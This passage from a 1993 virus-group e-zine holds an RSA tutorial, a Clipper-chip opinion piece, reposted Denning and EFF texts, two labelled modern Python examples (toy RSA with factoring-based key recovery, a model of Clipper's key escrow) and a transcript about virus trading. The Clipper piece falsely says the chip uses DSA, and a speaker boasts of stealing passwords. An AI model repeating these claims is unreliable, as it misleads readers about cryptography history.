idea of `Public-Key' encryption, which by far isn't `just another' encryption
method.
Public-Key crypto-systems are often referred to as `asymmetric' crypto-systems.
The now famous DES is a form of `symmetric' crypto-system. Symmetric systems
use a single key for both encrypting and decrypting. Asymmetric systems, on the
other hand, use two keys: a public key used to encrypt, and a private key used
to decrypt the cipher. (The cipher is the data after encryption.)
The RSA algorithm works on the idea that a number which is the product of two
large primes cannot, in practice, be broken back into those factors. The
algorithm works like so: first pick a number N that is the product of two
prime numbers (call the two primes a and b, so that N = a x b). Next, pick a
number that will become your public key, and call it P; P _must_ be less than
N. Now to encrypt a message M, you simply apply the following formula:
C=M^P(mod N)
% What the hell's `mod'? %
Public-key crypto-systems depend heavily on a branch of number theory known as
modular arithmetic or finite math. "Mod" can be thought of as the remainder of
a division: 13 mod 5 = 3, since that is the remainder when 13 is divided by 5.
But modular math has a pattern, a range, which depends on the modulus. The
numbers modulo 50 are 0, 1, 2, ..., 49; the smallest is 0, and the largest is
the modulus minus 1.
A less formal and probably easier-to-visualise version is called `clock
arithmetic'. If you restrict yourself to performing math by moving the hour
hand clockwise (addition) or counterclockwise (subtraction) around the face of
a clock, you'll soon see obvious patterns. Mostly, no matter how complex the
math is, your answer will _always_ be some number in the range 1 to 12, the
number of hours on a standard clock. This is actually the basis of `finite'
mathematics, whereby you are always working with integers, and always with a
finite set of them.
Therefore, the results of addition, subtraction, multiplication and division
will _always_ land in the set defined by the modulus. (huh? how can that be?)
As with the clock, the numbers "wrap around": if the numbers modulo 50 are the
integers from 0 to 49, then once we reach 49 (the largest number) and add 1, we
get 0. The number 49 wraps around to 0, and the reverse is true (0 minus 1
wraps around to 49).
The great thing about modular math is that it's finite: you don't have to worry
about calculations yielding numbers that grow out of control, and, since we
are working with integers, you don't lose any information through round-off
errors as you would with floating-point.
Back to our formula;
C=M^P(mod N)
where C is the encrypted message. Notice that the message must be represented
as numbers; you can use the ASCII value of each character. You see, it's not
hard to find two large prime numbers (a and b), but if I hand you their product
(N), you will perhaps never find a and b again! So in RSA, you get a huge
512-1024 bit number N which is the product of two large primes, a and b. The
number N is made public, while a and b remain secret. And once the formula is
applied, the encrypted message cannot be cracked without factoring N!
Now to decrypt the message we use the same formula with a different
exponent;
M=C^p(mod N) (Note: This is lower case `p')
where `p' (lower case) is the secret key. The secret key is calculated using
the formula;
P x p = 1 (mod L)
where L is the least common multiple of (a-1) and (b-1). In mathematical
terminology, `p' is the multiplicative inverse of `P' modulo L.
Algorithms are available for computing least common multiples and
multiplicative inverses in modular arithmetic. You can look up these formulas
for more understanding in almost any good college mathematics book, as I cannot
teach you math in a matter of paragraphs. But I suspect most of the readers
already have such basic mathematical skills.
Anyhow, RSA has undergone quite a bit of research into its algorithm.
Breaking the system requires the determination of `a' and `b', which are
the factors of `N' (don't forget `N' and `P' are publicly known). Once you
know `a' and `b', the factors of `N', you can easily calculate L. Knowing L
and P, you can calculate `p' (lower case), and decrypt the ciphertext. This
boils down to the task of factoring a number into its prime components, a
perennially popular problem in number theory that continues to occupy the
minds and computers of mathematicians around the world.
In October 1988, it took an international group of computer scientists nearly
a month to factor a 100-digit number. More than 400 computers worked on the
problem during idle hours to find the number's two factors, one 41 digits long,
the other 60 digits long. In June 1990, another team factored a 155-digit
number. The number was hand-picked to make the task easier, but it still took
275 years' worth of ONE computer's time. To keep pace with ever-faster
computers, RSA's inventors can simply add more digits to the system's key.
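The whole scheme above, worked through with the article's own symbols as an
added example (this is not code from the article, nor RSA Data Security's
implementation). It covers both the modular arithmetic section (`mod', the
finite set 0 .. L-1, the multiplicative inverse) and the key formulas
N = a x b, L = lcm(a-1, b-1), P x p = 1 (mod L), C = M^P (mod N) and
M = C^p (mod N). The primes a = 61 and b = 53 and the public key P = 17 are
toy values constructed for the example; the last two functions show the
article's point that factoring N hands over `p', which is exactly why a real
N is 512-1024 bits and not four digits:

```python
"""Added worked example of the RSA scheme described in the article, using
the article's symbols: N = a x b, public key P, secret key p,
L = lcm(a-1, b-1), C = M^P (mod N), M = C^p (mod N).  The primes 61 and 53
and the public key 17 are toy values constructed for this example."""
from math import gcd


def lcm(x, y):
    """Least common multiple, used for L = lcm(a-1, b-1)."""
    return x * y // gcd(x, y)


def mod_inverse(P, L):
    """Return p with P * p = 1 (mod L), by the extended Euclidean algorithm.
    The result is wrapped into the finite set 0 .. L-1, as the article's
    clock arithmetic requires."""
    if gcd(P, L) != 1:
        raise ValueError("P and L must be coprime for an inverse to exist")
    old_r, r = P, L
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    return old_s % L


def keygen(a, b, P):
    """Return (N, p): the public modulus and the secret exponent."""
    N = a * b
    L = lcm(a - 1, b - 1)
    return N, mod_inverse(P, L)


def encrypt(M, P, N):
    """C = M^P (mod N).  pow() with a modulus keeps every intermediate inside
    0 .. N-1, so the numbers never grow out of control."""
    return pow(M, P, N)


def decrypt(C, p, N):
    """M = C^p (mod N)."""
    return pow(C, p, N)


def encrypt_text(text, P, N):
    """The article's suggestion: one number per character, its ASCII value."""
    return [encrypt(ord(ch), P, N) for ch in text]


def decrypt_text(blocks, p, N):
    return "".join(chr(decrypt(C, p, N)) for C in blocks)


def factor(N):
    """Trial division.  Feasible only for a toy N; for the 512-1024 bit N the
    article describes, this step is what stops anyone without a and b."""
    f = 2
    while f * f <= N:
        if N % f == 0:
            return f, N // f
        f += 1
    raise ValueError("N has no small factor: not a product of two primes")


def recover_secret_key(N, P):
    """The attack the article describes: factor N, rebuild L, invert P."""
    a, b = factor(N)
    return mod_inverse(P, lcm(a - 1, b - 1))


if __name__ == "__main__":
    N, p = keygen(61, 53, 17)            # constructed toy key: N = 3233
    C = encrypt(65, 17, N)               # `A' is ASCII 65
    print("N =", N, " p =", p, " C =", C, " M =", decrypt(C, p, N))
    print("recovered p from public (N, P):", recover_secret_key(N, 17))
```

Note that P = 17 works here because gcd(17, 780) = 1; mod_inverse refuses any
P that shares a factor with L, which is the real constraint on the public key
rather than the article's weaker "P must be less than N".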
================================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Clipper Chip : New Government Standard? -N
E- or New Government Joke?" Nu
-N uK
Nu By KE
uK NuKE Supporters E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% New Government Standard or Joke? %
Since the beginning of the new year, we have been waiting to hear from NIST
whether DES will remain the standard encryption method used by federal
agencies.
The computer industry would like NIST to adopt the RSA technology, but that
is not likely to happen. One reason: if RSA, a privately developed technology,
becomes the new standard, the government will have to pay royalties for its
use. And _even_ more important, the NSA does not want the government to back
the RSA encryption system. Why?
"The NSA dislikes our system because its too hard to break!"
"They clearly don't like what we do, but we're succeeding in spite of that."
are statements quoted from James Bidzos, president of RSA Data Security.
And frankly, this is very true. RSA was developed in 1978, more than
15 years ago! After so many years of resisting Public-Key encryption systems,
the government _finally_ endorsed one as a new National Standard!
Unlike RSA, however, the government's DSA (Digital Signature Algorithm) depends
on a single government-issued _prime number_. Where's the trust? I stated in
the previous info-journal that the NSA would _never_ introduce an encryption
system that is unbreakable by them! The `Clipper Chip' uses the government's
existing DSA system.
What the government is saying is this: "Take a P! Not any P! This P!" (Read
the article concerning RSA to understand RSA public-key algorithms.) What good
is it if we are `tricked' into using a P (prime number(s)) that the government
issues? It only means that the government (NSA) wants the cipher to be,
perhaps, unbreakable to the general public. But if the NSA wishes to decipher
your cipher, and you are using this government standard, it can _easily_ do
so. It's not that you don't trust anybody, it's that you don't trust everybody.
And `everybody' includes the government! Why should we let the government get
the upper hand again? We got exploited the first time with DES, and now it's
trying to do exactly the same all over again.
% Clipper Released %
I take for granted that everybody has read the document on the Clipper Chip
released by The White House, Office of the Press Secretary. If not, you may
obtain a copy by calling up a NuKE-NeT system and looking through old messages
posted in the General message base, or you can get the file via anonymous FTP
from csrc.ncsl.nist.gov in directory /pub/nistnews, or via the NIST Computer
Security BBS at 301-948-5717.
A copyrighted article in the Friday, May 7th, 1993 `Washington Post' describes
a letter sent to President Clinton by 30+ major electronics companies and trade
associations expressing their concern about the Clipper chip. The article
describes what the Clipper chip is, explains that it was developed to allow
encryption of voice and fax with a method for law enforcement to listen in when
authorized, summarizes the key aspects of the chip, and says:
Since the White House proposed the plan three weeks ago, many in the
computer and communications industries have responded with scepticism.
Critics wonder how good the secret government technology really would
be and worry that agencies might abuse it to tap calls without court
orders.
A NIST spokesman said they had not read the letter yet, but commented that
Clinton has made it clear he wants industry participation.
Signers of the letter include IBM, AT&T, Lotus, Microsoft, McCaw Cellular and
MCI, as well as the ACLU. The article notes the apparent conflict between
AT&T signing the letter and its stated intention to use the chip. AT&T's
response was that they are just seeking clarification and do not oppose Clipper.
Let's look at the structure of Clipper and DES. A brute-force search of the
DES key space is 2^56 trials (56-bit key), each rippling through 16 rounds.
Clipper is said to use 32 rounds, with the key extended to 80 bits, so 2^80
trials. Current desktop personal computers allow brute-force attacks of up to
about 2^50. This means that a 2^80 brute-force key search is clearly
impractical for a few years to come: 2^80 is 2^30 (roughly a billion) times
more work than 2^50.
When DES was named the standard in 1977, it was already suspected that the
algorithm's strength relied more on the S-box structure than on the key input,
which is what gave rise to the belief that the NSA holds a `backdoor' on DES
and the upper hand in crypto technology. Clearly, whatever computing power the
NSA had then is surely equal to or more than what most desktop computers can do
today. So surely, with the NSA's resources, an 80-bit key may fall to brute
force in perhaps the next 1-2 years. But does the NSA hold an advantage that
can `instantly' decipher the ciphertext? If the system's keys are issued and
held by the government, as Clipper's escrowed unit keys are, that power
certainly exists. The movie `Sneakers' hints at this issue, and we regard it as
SciFi, fiction, for entertainment purposes only! Look deeper, a lot deeper:
isn't it hinting at exactly this?
I leave you with a technical summary of the Clipper Chip by Dorothy Denning,
and an EFF analysis of the proposed Clipper Chip. These articles are
distributed on an `as-is' basis, as that is how they were both publicly
posted on the Internet newsgroup sci.crypt.
% The Clipper Chip : A Technical Summary %
Newsgroups: sci.crypt
Subject: THE CLIPPER CHIP: A TECHNICAL SUMMARY
Date: 19 Apr 93 18:23:27 -0400
Distribution: world
Organization: Georgetown University
The following document summarizes the Clipper Chip, how it is used,
how programming of the chip is coupled to key generation and the
escrow process, and how law enforcement decrypts communications.
Since there has been some speculation on this news group about my
own involvement in this project, I'd like to add that I was not in
any way involved. I found out about it when the FBI briefed me on
Thursday evening, April 15. Since then I have spent considerable
time talking with the NSA and FBI to learn more about this, and I
attended the NIST briefing at the Department of Commerce on April
16.
The document below is the result of that effort.
Dorothy Denning
---------------
THE CLIPPER CHIP: A TECHNICAL SUMMARY
Dorothy Denning
April 19, 1993
INTRODUCTION
On April 16, the President announced a new initiative that will
bring together the Federal Government and industry in a voluntary
program to provide secure communications while meeting the
legitimate needs of law enforcement. At the heart of the plan is
a new tamper-proof encryption chip called the "Clipper Chip"
together with a split-key approach to escrowing keys. Two escrow
agencies are used, and the key parts from both are needed to
reconstruct a key.
CHIP STRUCTURE
The Clipper Chip contains a classified 64-bit block encryption
algorithm called "Skipjack." The algorithm uses 80 bit keys
(compared with 56 for the DES) and has 32 rounds of scrambling
(compared with 16 for the DES). It supports all 4 DES modes of
operation. Throughput is 16 Mbits a second.
Each chip includes the following components:
the Skipjack encryption algorithm
F, an 80-bit family key that is common to all chips
N, a 30-bit serial number
U, an 80-bit secret key that unlocks all messages encrypted with
the chip
ENCRYPTING WITH THE CHIP
To see how the chip is used, imagine that it is embedded in the
AT&T telephone security device (as it will be). Suppose I call
someone and we both have such a device. After pushing a button to
start a secure conversation, my security device will negotiate a
session key K with the device at the other end (in general, any
method of key exchange can be used). The key K and message stream
M (i.e., digitized voice) are then fed into the Clipper Chip to
produce two values:
E[M; K], the encrypted message stream, and
E[E[K; U] + N; F], a law enforcement block.
The law enforcement block thus contains the session key K encrypted
under the unit key U concatenated with the serial number N, all
encrypted under the family key F.
CHIP PROGRAMMING AND ESCROW
All Clipper Chips are programmed inside a SCIF (secure computer
information facility), which is essentially a vault. The SCIF
contains a laptop computer and equipment to program the chips.
About 300 chips are programmed during a single session. The SCIF
is located at Mikotronx.
At the beginning of a session, a trusted agent from each of the two
key escrow agencies enters the vault. Agent 1 enters an 80-bit
value S1 into the laptop and agent 2 enters an 80-bit value S2.
These values serve as seeds to generate keys for a sequence of
serial numbers.
To generate the unit key for a serial number N, the 30-bit value N
is first padded with a fixed 34-bit block to produce a 64-bit block
N1. S1 and S2 are then used as keys to triple-encrypt N1, producing
a 64-bit block R1:
R1 = E[D[E[N1; S1]; S2]; S1] .
Similarly, N is padded with two other 34-bit blocks to produce N2
and N3, and two additional 64-bit blocks R2 and R3 are computed:
R2 = E[D[E[N2; S1]; S2]; S1]
R3 = E[D[E[N3; S1]; S2]; S1] .
R1, R2, and R3 are then concatenated together, giving 192 bits. The
first 80 bits are assigned to U1 and the second 80 bits to U2. The
rest are discarded. The unit key U is the XOR of U1 and U2. U1
and U2 are the key parts that are separately escrowed with the two
escrow agencies.
As a sequence of values for U1, U2, and U are generated, they are
written onto three separate floppy disks. The first disk contains
a file for each serial number that contains the corresponding key
part U1. The second disk is similar but contains the U2 values.
The third disk contains the unit keys U. Agent 1 takes the first
disk and agent 2 takes the second disk. The third disk is used to
program the chips. After the chips are programmed, all information
is discarded from the vault and the agents leave. The laptop may
be destroyed for additional assurance that no information is left
behind.
The protocol may be changed slightly so that four people are in the
room instead of two. The first two would provide the seeds S1 and
S2, and the second two (the escrow agents) would take the disks
back to the escrow agencies.
The escrow agencies have as yet to be determined, but they will not
be the NSA, CIA, FBI, or any other law enforcement agency. One or
both may be independent from the government.
LAW ENFORCEMENT USE
When law enforcement has been authorized to tap an encrypted line,
they will first take the warrant to the service provider in order
to get access to the communications line. Let us assume that the
tap is in place and that they have determined that the line is
encrypted with Clipper. They will first decrypt the law
enforcement block with the family key F. This gives them E[K; U]
+ N. They will then take a warrant identifying the chip serial
number N to each of the key escrow agents and get back U1 and U2.
U1 and U2 are XORed together to produce the unit key U, and E[K; U]
is decrypted to get the session key K. Finally the message stream
is decrypted. All this will be accomplished through a special
black box decoder operated by the FBI.
ACKNOWLEDGMENT AND DISTRIBUTION NOTICE. All information is based
on information provided by NSA, NIST, and the FBI. Permission to
distribute this document is granted.
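As an added illustration (not part of Denning's summary or of this journal),
the following Python model walks through the flow just described: a programming
session derives U1, U2 and U for each serial number from the two agents' seeds,
the chip emits E[M; K] together with the law enforcement block E[E[K; U] + N; F],
and the decoder reverses it with F plus the two escrowed key parts. Skipjack
was classified, so the model substitutes a stand-in 64-bit block cipher with an
80-bit key (an 8-round Feistel network whose round function is HMAC-SHA256); the
34-bit padding constants, the use of CBC mode with a random IV for the
variable-length values, and the 4-byte encoding of N inside the block are also
assumptions made for the model, not details from the summary. The model also
checks two properties the summary implies: that a party holding only the family
key F can read the serial number N out of the law enforcement block but not the
session key, and that a single escrow agent's key part is useless on its own.

```python
"""Model of the Clipper escrow flow in Denning's summary (added example, not
Denning's or NuKE's code). Skipjack is replaced by a stand-in cipher; the pad
constants, CBC mode with random IV and the 4-byte serial field are assumptions."""
import hashlib
import hmac
import os

BLOCK = 8      # 64-bit block, as in Skipjack and DES
KEY_LEN = 10   # 80-bit keys
ROUNDS = 8     # rounds of the stand-in Feistel cipher (assumption)
PADS = (0x155555555, 0x2AAAAAAAA, 0x0F0F0F0F0)   # assumed fixed 34-bit pads

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key: bytes, i: int, half: bytes) -> bytes:
    # Keyed round function: 32 bits of HMAC-SHA256 over (round index, right half).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Stand-in for E[block; key]: balanced Feistel network on one 64-bit block."""
    assert len(key) == KEY_LEN and len(block) == BLOCK
    left, right = block[:4], block[4:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, i, right))
    return right + left   # undo the final swap so decryption mirrors encryption

def decrypt_block(key: bytes, block: bytes) -> bytes:
    """Stand-in for D[block; key]: the same rounds in reverse order."""
    assert len(key) == KEY_LEN and len(block) == BLOCK
    left, right = block[:4], block[4:]
    for i in reversed(range(ROUNDS)):
        left, right = right, _xor(left, _round_fn(key, i, right))
    return right + left

def encrypt_cbc(key: bytes, data: bytes) -> bytes:
    """E[data; key] for any length: CBC with a random IV prefix, PKCS#7 padding."""
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad
    prev = os.urandom(BLOCK)
    out = [prev]
    for i in range(0, len(data), BLOCK):
        prev = encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def decrypt_cbc(key: bytes, data: bytes) -> bytes:
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        out.append(_xor(decrypt_block(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    plain = b"".join(out)
    return plain[:len(plain) - plain[-1]]

def unit_key_parts(serial: int, s1: bytes, s2: bytes):
    """Programming session: (U, U1, U2) for a 30-bit serial from seeds S1 and S2."""
    assert 0 <= serial < 2 ** 30
    r = b""
    for pad in PADS:
        n_i = ((serial << 34) | pad).to_bytes(BLOCK, "big")   # N padded to 64 bits
        r += encrypt_block(s1, decrypt_block(s2, encrypt_block(s1, n_i)))  # E[D[E[N_i;S1];S2];S1]
    u1, u2 = r[:KEY_LEN], r[KEY_LEN:2 * KEY_LEN]   # first and second 80 of 192 bits
    return _xor(u1, u2), u1, u2

def chip_encrypt(message, session_key, serial, unit_key, family_key):
    """What the chip emits: E[M; K] and the law enforcement block E[E[K; U] + N; F]."""
    ciphertext = encrypt_cbc(session_key, message)
    leaf = encrypt_cbc(family_key, encrypt_cbc(unit_key, session_key) + serial.to_bytes(4, "big"))
    return ciphertext, leaf

def open_leaf(leaf, family_key):
    """F alone opens the block: yields (E[K; U], N), with K still locked under U."""
    inner = decrypt_cbc(family_key, leaf)
    return inner[:-4], int.from_bytes(inner[-4:], "big")

def law_enforcement_decrypt(ciphertext, leaf, family_key, escrow1, escrow2):
    """Decoder flow: open the LEAF with F, fetch U1 and U2 for N, recover K, then M."""
    enc_k, serial = open_leaf(leaf, family_key)
    session_key = decrypt_cbc(_xor(escrow1[serial], escrow2[serial]), enc_k)
    return serial, session_key, decrypt_cbc(session_key, ciphertext)

def demo():
    """One programming session, one call on chip 1001, one authorized tap."""
    s1, s2 = os.urandom(KEY_LEN), os.urandom(KEY_LEN)   # seeds typed in by the two agents
    family_key = os.urandom(KEY_LEN)                    # F, common to all chips
    escrow1, escrow2, chips = {}, {}, {}                # agent 1's disk, agent 2's disk, chip keys
    for serial in range(1000, 1003):
        u, u1, u2 = unit_key_parts(serial, s1, s2)
        escrow1[serial], escrow2[serial], chips[serial] = u1, u2, u
    serial, session_key = 1001, os.urandom(KEY_LEN)     # K negotiated by the two devices
    message = b"constructed sample: digitized voice frames"
    ciphertext, leaf = chip_encrypt(message, session_key, serial, chips[serial], family_key)
    enc_k, seen_serial = open_leaf(leaf, family_key)    # what a holder of F alone learns
    _, got_key, got_msg = law_enforcement_decrypt(ciphertext, leaf, family_key, escrow1, escrow2)
    one_share_key = decrypt_cbc(escrow1[serial], enc_k)  # agent 1's part misused as U
    return {
        "serial": serial,
        "family_key_alone_sees_serial": seen_serial,
        "tap_recovers_key": got_key == session_key,
        "tap_recovers_message": got_msg == message,
        "one_share_recovers_key": one_share_key == session_key,
    }
```

Calling demo() returns a dictionary reporting that the tap recovers K and M,
that F alone reveals only the serial number, and that one escrow share does not
recover K. Note that with a real cipher the protocol's weakest points are the
ones the model makes visible: anyone with F can link traffic to a chip by its
serial number, and the secrecy of every session key rests on the escrow agents'
handling of U1 and U2.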
-------------------------------------------------------------------------------
% EFF Analysis of the Clipper Chip %
April 16, 1993
INITIAL EFF ANALYSIS OF CLINTON PRIVACY AND SECURITY
PROPOSAL
The Clinton Administration today made a major announcement
on cryptography policy which will affect the privacy and security of
millions of Americans. The first part of the plan is to begin a
comprehensive inquiry into major communications privacy issues
such as export controls which have effectively denied most people
easy access to robust encryption as well as law enforcement issues
posed by new technology.
However, EFF is very concerned that the Administration has
already reached a conclusion on one critical part of the inquiry, before
any public comment or discussion has been allowed. Apparently, the
Administration is going to use its leverage to get all telephone
equipment vendors to adopt a voice encryption standard developed
by the National Security Agency. The so-called "Clipper Chip" is an
80-bit, split key escrowed encryption scheme which will be built into
chips manufactured by a military contractor. Two separate escrow
agents would store users' keys, and be required to turn them over to
law enforcement upon presentation of a valid warrant. The
encryption scheme used is to be classified, but the chips will be
available to any manufacturer for incorporation into their
communications products.
This proposal raises a number of serious concerns.
First, the Administration appears to be adopting a solution
before conducting an inquiry. The NSA-developed Clipper chip may
not be the most secure product. Other vendors or developers may
have better schemes. Furthermore, we should not rely on the
government as the sole source for Clipper or any other chips. Rather,
independent chip manufacturers should be able to produce chipsets
based on open standards.
Second, an algorithm can not be trusted unless it can be tested.
Yet the Administration proposes to keep the chip algorithm
classified. EFF believes that any standard adopted ought to be public
and open. The public will only have confidence in the security of a
standard that is open to independent, expert scrutiny.
Third, while the use of the split-key, dual-escrowed
system may prove to be a reasonable balance between privacy and
law enforcement needs, the details of this scheme must be explored
publicly before it is adopted. What will give people confidence in the
safety of their keys? Does disclosure of keys to a third party waive
individual's fifth amendment rights in subsequent criminal
inquiries?
In sum, the Administration has shown great sensitivity to the
importance of these issues by planning a comprehensive inquiry into
digital privacy and security. However, the "Clipper chip" solution
ought to be considered as part of the inquiry, not be adopted before
the discussion even begins.
DETAILS OF THE PROPOSAL:
ESCROW
The 80-bit key will be divided between two escrow agents, each of
whom hold 40 bits of each key. Upon presentation of a valid
warrant, the two escrow agents would have to turn the key parts
over to law enforcement agents. Most likely the Attorney General
will be asked to identify appropriate escrow agents. Some in the
Administration have suggested one non-law enforcement federal
agency, perhaps the Federal Reserve, and one non-governmental
organization. But, there is no agreement on the identity of the agents
yet.
Key registration would be done by the manufacturer of the
communications device. A key is tied to the device, not to the person
using it.
CLASSIFIED ALGORITHM AND THE POSSIBILITY OF BACK DOORS
The Administration claims that there are no back door means by
which the government or others could break the code without
securing keys from the escrow agents and that the President will
be told there are no back doors to this classified algorithm. In order
to prove this, Administration sources are interested in arranging for
an all-star crypto cracker team to come in, under a security
arrangement, and examine the algorithm for trap doors. The results
of the investigation would then be made public.
GOVERNMENT AS MARKET DRIVER
In order to get a market moving, and to show that the government
believes in the security of this system, the feds will be the first big
customers for this product. Users will include the FBI, Secret Service,
VP Al Gore, and maybe even the President.
FOR MORE INFORMATION CONTACT:
Jerry Berman, Executive Director
Daniel J. Weitzner, Senior Staff Counsel
Internet Address: eff@eff.org
===============================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Lies, Scandals, and Roomers of the Anti- -N
E- Virus Community" Nu
-N uK
Nu By KE
uK Alan Soloman, ARiSToTLe, Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
The following is the _exact_ conversation/interview between Aristotle,
Rock Steady, and Alan Soloman, concerning the virus problem of today. The
conversation was recorded by Rock Steady, the NSA (naturally), and Unitel, who
alerted the RCMP because this was a 5 hour conference billed onto NuKE's own
PBX, which Unitel thought was suspicious, so they killed our PBX! (Geez, talk
about trust!) Nothing here has been recreated; this conversation was recorded
on tape, in rather bad quality, but nevertheless it will stand against any
accusation of fabrication, which it is not!
PS: Don't forget to read the conclusion at the end of the conversation; if you
must read one thing, let it be the conclusion.
% In the Beginning... there was light, then Rock, and of course Aristotle %
NOTE: RS=Rock Steady ; AR=Aristotle ; SO=Alan Soloman ; ??= Mrs ?
??> Hello, may I help you?
AR> Alan Soloman Please.
??> Who's calling?
AR> John
<Pause>
SO> Hello?
AR> Hi, how you doing? If you're not busy, ah.. you know Rock Steady is here on
the phone with me.
SO> Yeah
AR> And I wanted to ask you a couple of things if I could.
SO> Yeah
AR> That article came out in VNI. [Virus News International; its a magazine]
SO> Which one
AR> The one that came out in the May issue.
SO> Yeah
AR> Who's the author of that?
SO> Which article are you talking about?
AR> The one that says `Back in Business'
SO> ah, I don't know which is the article you are referring to.
AR> ah, John <Censored>, also known publicly as-
SO> The trouble is ah, it's been a few weeks since I read it. Does it have an
author to it?
AR> No.
SO> Then it's written by the editor.
AR> It's written by Paul, okay I've talked to Paul about it. Okay I've twice seen
in there whereby you have written articles and tossed me into it.
SO> Toss you into what?
AR> ah a couple of articles where you mention my name.
SO> Did I say anything that wasn't true?
AR> ah, that's not what I'm getting at. That's not what I'm calling about.
What I'm calling about, is this particular article where they mention the
school and everything.
SO> Yeah
AR> I spoke to Paul the other day, and he sent me a copy in the mail.
SO> Yeah
AR> So I was wondering, is there going to be a retraction on it?
SO> Is it not true then?
AR> Na-
RS> What right gives you-
SO> But you told me you were a student at-
AR> No, no, no, about being Back in Business. It stated three times that I
publicly stated that I was closing my system.
SO> Well I'm confused-
RS> That's a start
SO> ah, I got a fax, no it's an email, I forget now, this was a few months ago.
Where you were offering viruses for sale. Is that not the case?
AR> Na, that's not the case.
SO> Something you posted on Fidonet.
AR> I didn't know that I posted it!
SO> It's a good forgery, if it's not you that did this.
AR> Well, my point is-
SO> Want me to call you back, this is costing you a fortune.
AR> That's okay I can handle it. [Yeah sure RS is paying this 3-way]
RS> <grins>
AR> Reason I had Rock Steady call was, we were talking 'bout this as well. ah-
SO> When I talk about your position, the position is that you're positioned in
William & Mary's college, or you graduated?
AR> I graduated!
SO> So you're no longer with the college.
AR> I graduated from the college, ah after this issue came out. But the point
of it is this, it states in here real clearly that I'm Back in Business!
And that I have forgotten my pledge, kay! I think I went back into business
when I change to VR, there's nobody on my board!
SO> So you're not offering viruses any more?
AR> I haven't since that day I told you. See I have ten people, believe it or
not, they're all AV.
SO> Who are they?
AR> <CENSORED> has some boys that like to call me from time to time.
SO> What do you mean `his boys'
AR> Some people he's got working for him. They call me up.
SO> The trouble is, I don't know what you mean by the AV.
AR> Well AntiVirus researchers, people that do beta testing for AntiVirus
software.
SO> The trouble is, anyone can call and say they're AV.
AR> Well okay, anybody can call themselves a virus writer. I'm pr-
SO> Ththth-that's why I'm asking you-
AR> I'm really pissed off about this, okay. The way they mention my name in
there, okay, they basically came out and said I was fire! This guy on the
phone right now, knows for a fact that I've been doing research for this
crap for a year now. And a-
SO> Sorry, this guy you say, you mean Joe? [Joe Greco aka Rock Steady]
AR> Yeah, okay... Joe?
RS> Yeah
AR> okay, anyway this stuff has been going on you know, and its been nothing
but research. I told Paul Robison to call the school! And formally request
that article and he can have it.
SO> What's the phone number?
AR> ah, okay, ah area code 804-221-4000 is the main number.
SO> And who is the article with?
AR> ah, Kenny Chang
SO> So who's posting all the messages saying your selling viruses?
AR> I don't know.
SO> Because they seem to be coming-
AR> Well I'll tell yeah
RS> Do you have those posts we'd like to see them.
SO> I could fax them to you. Gimme a fax number.
AR> I don't have a fax number
RS> Well I'm unwilling to give you my fax number.
SO> Well I received them as a fax.
AR> Well that's my point, the school is rather pissed off about this as well.
SO> Allow me to fax them too?
AR> well I dunno, if somebody's posting out there, I can take and change my
system right now. I can phreak one of these password files from any front-
door, and when I get in, I can get anybody's session password, and change my
damn fido feed to anybody in the world.
RS> Are you willing to receive a copy by mail Aristotle, yes or no?
AR> Sure I'll take a copy by the mail.
RS> or I can make him send it the NuKE PO Box.
AR> Sure, that's fine.
RS> Okay Alan, I'll call you back in a week to give you our PO Box to receive
that fax.
SO> I could do that
AR> Yeah, I'd like to have that. Now here's what it is...okay...I've been
looking at this stuff upside down, and one-the-other, and there's a whole
lot of things I was unhappy about. Alan I'm really pissed about this one.
SO> What are you pissed about?
AR> What am I pissed about! Damn Alan, you know. For a year now everyone knows
that I'm here straightening this crap out. Between Sara Gordon's posting out
there about VX-Net being an underground exchange network, and all this kind
of horse-shit and everything. And this article coming out here, saying I'm
a student in this school, now why did you have to put that in there?
SO> Well because, what you say, was that you were doing this project.
AR> But nobody mentioned that!
SO> You said that!
AR> But in the article it doesn't say anything about this damn research thing!
The only thing that is said is that I'm a student at William and Mary's,
It doesn't mention the fact that I'm doing research for the school!
RS> Of course it all ends up that they pick out what they want, and paint a
different picture of you!
AR> I've always been pretty straight with you. You know Sara Gordon walks
around saying, "I'll never log on to a bulletin board, never, never, never!"
[Meaning a `Virus' exchange bulletin board]
SO> Its been a few weeks since I read that article, can I call you back while I
go get a copy of this article. Wait, I'll see if I can get it...
<short pause>
SO> Sorry, I can't seem to find a copy in the house. See you called me at home,
rather than the office. What did the article say?
AR> It said, "John <Censored>, also known publicly under the name Aristotle,
sysop of The Black Axes BBS. One of several names used my Mr. John,
recently announced, the self-imposed shut down of his bulletin board
system. For a while it looked like there would be no more viruses for
sale, or given away free, depending on who you were! ..... John's a
student at William and Mary's college, has apparently forgotten his
pledge and is back in business!
AR> Now then, there's a whole lot of people here running around, saying all sorts
of things. Lemme ask you something, a lady under the name Katy, no, Cary
something.
SO> Cary, Cary Lang?
AR> Yes, she says she works for you! ok?
SO> Not quite true.
AR> Well she also states she was on my board, and she's from Finland!
SO> Well, Cary Lang is Finnish, doesn't work for me, works for a company, called
"Land Vision"
AR> Same place with that guy `Dire', Kaluco Janhontalo or something like this.
Now this lady (Cary), was posting in the echoes, in response to some letter
saying `John's boards down you know...' She comes out and says, "NO, its up,
plenty of viruses, I was on there today." She used in her tag line, "Works
